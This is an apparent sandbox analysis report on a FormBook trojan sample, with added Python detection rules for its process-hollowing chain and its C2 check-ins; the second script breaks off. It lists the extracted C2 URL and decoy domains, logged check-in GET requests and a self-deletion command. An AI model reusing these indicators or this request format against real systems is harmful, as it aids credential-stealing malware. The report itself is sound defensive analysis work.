Windows Analysis Report mvui1vY6Mo

Overview

General Information

Sample Name: mvui1vY6Mo (renamed file extension from none to exe)
Analysis ID: 458944
MD5: 059b1244ac9fda54de086692db4b5a08
SHA1: 6e5f6326bd9da7e5d9c70b3e4491d308eb7f842b
SHA256: abb29be2c1eccd851bdb99b126e822a8cf0f57be95e9b71a921aa703b2c285be
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • mvui1vY6Mo.exe (PID: 6656 cmdline: 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: 059B1244AC9FDA54DE086692DB4B5A08)
    • mvui1vY6Mo.exe (PID: 6704 cmdline: 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: 059B1244AC9FDA54DE086692DB4B5A08)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmmon32.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
        • cmd.exe (PID: 6380 cmdline: /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
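
The tree above is the chain worth detecting: the sample launched from the Desktop starts a second copy of itself (the suspended child that is then hollowed), a SysWOW64 system binary (cmmon32.exe) shows up in the injected lineage, and cmd.exe is used to delete the original file. The following is an added example, not code from the report or from Joe Sandbox: two rules over process-creation events, in Python. The event records are constructed from the report's process tree; the parent of PID 6656, the cmd.exe image path, and the nesting of explorer.exe and cmmon32.exe under PID 6704 are taken from how the report draws the tree, not from OS-level telemetry, and the function and rule names are this example's own.

```python
"""Two detection rules over process-creation events, added example.

The events are constructed from the report's process tree (pid, parent pid,
image, command line) and stand in for Sysmon Event ID 1 / EDR telemetry.
Assumptions are marked in comments; nothing here is Joe Sandbox code.
"""
import ntpath
import re

EVENTS = [
    # Root sample; its own parent is not shown in the report (ppid 0 = unknown).
    {"pid": 6656, "ppid": 0, "image": r"C:\Users\user\Desktop\mvui1vY6Mo.exe",
     "cmdline": r"'C:\Users\user\Desktop\mvui1vY6Mo.exe'"},
    # Second copy of the sample, the child that gets hollowed.
    {"pid": 6704, "ppid": 6656, "image": r"C:\Users\user\Desktop\mvui1vY6Mo.exe",
     "cmdline": r"'C:\Users\user\Desktop\mvui1vY6Mo.exe'"},
    # explorer.exe and cmmon32.exe are nested under 6704 as the report draws them.
    {"pid": 3424, "ppid": 6704, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 6336, "ppid": 6704, "image": r"C:\Windows\SysWOW64\cmmon32.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmmon32.exe"},
    # cmd.exe image path is assumed (the report lists only its command line).
    {"pid": 6380, "ppid": 6336, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'"},
    {"pid": 6400, "ppid": 6380, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.I)
SYSTEM_DIR = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.I)
# Interpreters that legitimately launch cmd.exe; anything else from a system
# directory doing so is worth a look.
SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
          "wscript.exe", "cscript.exe"}
# "del [/flags] <path>" with the path optionally single- or double-quoted.
DEL_RE = re.compile(
    r"\bdel\b\s+(?:/\w+\s+)*['\"]?(?P<path>[a-z]:\\[^'\"]+?)['\"]?\s*$", re.I)


def index_by_pid(events):
    return {e["pid"]: e for e in events}


def same_image_self_spawn(events):
    """A binary in a user-writable path launching a second copy of itself,
    the shape behind 'Creates a process in suspended mode' and hollowing.
    Returns (parent_pid, child_pid) pairs."""
    idx = index_by_pid(events)
    hits = []
    for e in events:
        parent = idx.get(e["ppid"])
        if (parent and parent["image"].lower() == e["image"].lower()
                and USER_WRITABLE.match(e["image"])):
            hits.append((parent["pid"], e["pid"]))
    return hits


def self_delete_via_system_binary(events):
    """cmd.exe spawned by a non-shell system binary to delete a file under
    C:\\Users. Also reports whether the deleted path is the image of any
    process in the event set, which here is the original sample."""
    idx = index_by_pid(events)
    running_images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        parent = idx.get(e["ppid"])
        if not (m and parent):
            continue
        odd_parent = (SYSTEM_DIR.match(parent["image"]) is not None
                      and ntpath.basename(parent["image"]).lower() not in SHELLS)
        target = m.group("path")
        if odd_parent and USER_WRITABLE.match(target):
            hits.append({
                "cmd_pid": e["pid"],
                "parent": ntpath.basename(parent["image"]),
                "target": target,
                "target_is_running_image": target.lower() in running_images,
            })
    return hits


if __name__ == "__main__":
    print("self-spawn:", same_image_self_spawn(EVENTS))
    print("self-delete:", self_delete_via_system_binary(EVENTS))
```

Because the report nests injected processes under the injector, the OS-level parent of cmmon32.exe may differ from what the tree shows; the second rule therefore does not depend on the ancestor chain and only adds, as context, whether the deleted path matches an image seen anywhere in the event set.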

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ejsuniqueclasses.com/ehp9/"], "decoy": ["kebao100.com", "telco360.com", "gilleyaviation.com", "thedangleman.com", "kmpetersonphoto.com", "bykjsz.com", "comparaca.com", "wlalumsforantiracism.com", "razerzonr.com", "856380062.xyz", "cubesoftwaresolution.com", "atokastore.com", "joinlashedbyjamie.com", "azcorra.com", "lilys-galaxy.com", "wheretheresaytheresaway.com", "avantix-colts.com", "pornsitehub.com", "jagoviral.com", "loansforgiven.com", "bainrix.com", "jesuschrist.care", "gunvue.com", "ijajs.com", "gee825.com", "runninghogfarm.com", "zotaac-ee.com", "secretholeagency.com", "maakapforgoodhealth.com", "lovebodystyles.com", "macrovigilance.com", "attractanygirl.com", "ingawellinc.com", "bet365q8.com", "globalmillionairessclub.com", "marcellaandann.com", "cmnkt-byem.xyz", "wolfzoom.net", "laura-claim.com", "tunnurl.com", "twinedinmagic.com", "libertybaptistchurchmedia.com", "pureembryo.com", "ssdigitaltirunelveli.com", "skiphirescunthorpe.com", "displashop.com", "whitebylole.com", "eggplantreport.com", "rje3.net", "healthpragency.com", "dxdoors.com", "blissbunnyworld.com", "ifn.xyz", "nationalurc.info", "designcumbriauk.com", "sonchirraiyya.com", "466se.com", "bombayy.com", "mairaalves.art", "nazarppe.com", "smokinskiing.com", "redwhitescrewed.com", "quantumnepal.codes", "circusocks.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.mvui1vY6Mo.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.mvui1vY6Mo.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.mvui1vY6Mo.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0.2.mvui1vY6Mo.exe.2eb0000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.mvui1vY6Mo.exe.2eb0000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: mvui1vY6Mo.exe, VirusTotal: Detection: 58%
Source: mvui1vY6Mo.exe, ReversingLabs: Detection: 60%
Yara detected FormBook
Source: Yara match, file source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: mvui1vY6Mo.exe, Joe Sandbox ML: detected
Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: mvui1vY6Mo.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: mvui1vY6Mo.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: C:\xampp\htdocs\Cryptor\0238f0732c6a40e5a54bccb37ef03c58\Loader\Project1\Release\Project1.pdb source: mvui1vY6Mo.exe
Source: Binary string: cmmon32.pdbGCTL source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: mvui1vY6Mo.exe, 00000000.00000003.655268474.0000000003240000.00000004.00000001.sdmp, mvui1vY6Mo.exe, 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: mvui1vY6Mo.exe, cmmon32.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 0_2_002F431C FindFirstFileExW
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_002F431C FindFirstFileExW
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 4x nop then pop esi, 2_2_00415848
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 4x nop then pop ebx, 2_2_00406AC2
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 4x nop then pop ebx, 2_2_00406AA2
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop esi, 11_2_008B5848
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop ebx, 11_2_008A6AA2
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop ebx, 11_2_008A6AC2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.ejsuniqueclasses.com/ehp9/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.856380062.xyz
Source: C:\Windows\SysWOW64\cmmon32.exe, DNS query: www.856380062.xyz
Source: global traffic, HTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1 | Host: www.ejsuniqueclasses.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic, HTTP traffic detected: GET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1 | Host: www.healthpragency.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic, HTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky HTTP/1.1 | Host: www.circusocks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic, HTTP traffic detected: GET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1 | Host: www.466se.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: Joe Sandbox View, IP Address: 52.58.78.16
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: ILIGHT-NETUS
Source: unknown, DNS traffic detected: queries for: www.ejsuniqueclasses.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 03 Aug 2021 20:19:35 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.663579400.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: cmmon32.exe, 0000000B.00000002.915247011.0000000000C60000.00000004.00000020.sdmp, String found in binary or memory: http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pV
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
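
The GETs listed in this section share the configured C2 path /ehp9/ and a two-parameter query, and go to a mix of the configured C2 host and hosts from the decoy list; none carries a User-Agent, and each is followed by seven NUL bytes. As an added example that is not part of the report or of Joe Sandbox, the Python below parses raw request text, maps each Host header to the extracted configuration (real C2, decoy, or unknown) and scores the check-in shape. The requests are constructed from three of the ones listed above plus one benign request for contrast, the decoy list is truncated to five of the 64 domains the report extracted, and the function names and the three-of-four scoring threshold are this example's own.

```python
"""Map FormBook check-in requests to the extracted configuration, added example.

Configuration values are the ones the report extracted (decoy list truncated);
the raw requests are constructed from the GETs the report lists plus one
benign request for contrast. Not Joe Sandbox code.
"""
from urllib.parse import parse_qs, urlsplit

CONFIG = {
    "C2 list": ["www.ejsuniqueclasses.com/ehp9/"],
    # Five of the 64 decoy domains in the report's configuration.
    "decoy": ["kebao100.com", "856380062.xyz", "healthpragency.com",
              "466se.com", "circusocks.com"],
}

NUL_TAIL = "\x00" * 7  # the "Data Raw: 00 00 00 00 00 00 00" the report shows

SAMPLE_REQUESTS = [
    "GET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1\r\n"
    "Host: www.ejsuniqueclasses.com\r\nConnection: close\r\n\r\n" + NUL_TAIL,
    "GET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1\r\n"
    "Host: www.healthpragency.com\r\nConnection: close\r\n\r\n" + NUL_TAIL,
    "GET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1\r\n"
    "Host: www.466se.com\r\nConnection: close\r\n\r\n" + NUL_TAIL,
    # Constructed benign request, not from the report.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def c2_endpoints(config):
    """Split 'host/path/' C2 entries into (host, path) tuples."""
    out = []
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)
        out.append((parts.hostname.lower(), parts.path))
    return out


def parse_request(raw):
    """Minimal HTTP/1.x request parser: method, target, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def classify_host(host, config):
    """'c2' for a configured C2 host, 'decoy' for a (www.-prefixed) decoy
    domain, 'unknown' otherwise."""
    host = host.lower()
    if host in {h for h, _ in c2_endpoints(config)}:
        return "c2"
    bare = host[4:] if host.startswith("www.") else host
    if bare in {d.lower() for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def assess(raw, config):
    """Score one request for the FormBook check-in shape seen in the report."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    url = urlsplit(req["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    c2_paths = {p for _, p in c2_endpoints(config)}
    result = {
        "host": host,
        "host_role": classify_host(host, config),
        "c2_path": url.path in c2_paths,
        "two_params": len(params) == 2,
        "no_user_agent": "user-agent" not in req["headers"],
        "nul_body": bool(req["body"]) and set(req["body"]) == {"\x00"},
    }
    shape_hits = sum(result[k] for k in ("c2_path", "two_params",
                                         "no_user_agent", "nul_body"))
    result["verdict"] = ("formbook_checkin"
                         if result["host_role"] != "unknown" and shape_hits >= 3
                         else "no_match")
    return result


def triage(requests=SAMPLE_REQUESTS, config=CONFIG):
    return [assess(r, config) for r in requests]


if __name__ == "__main__":
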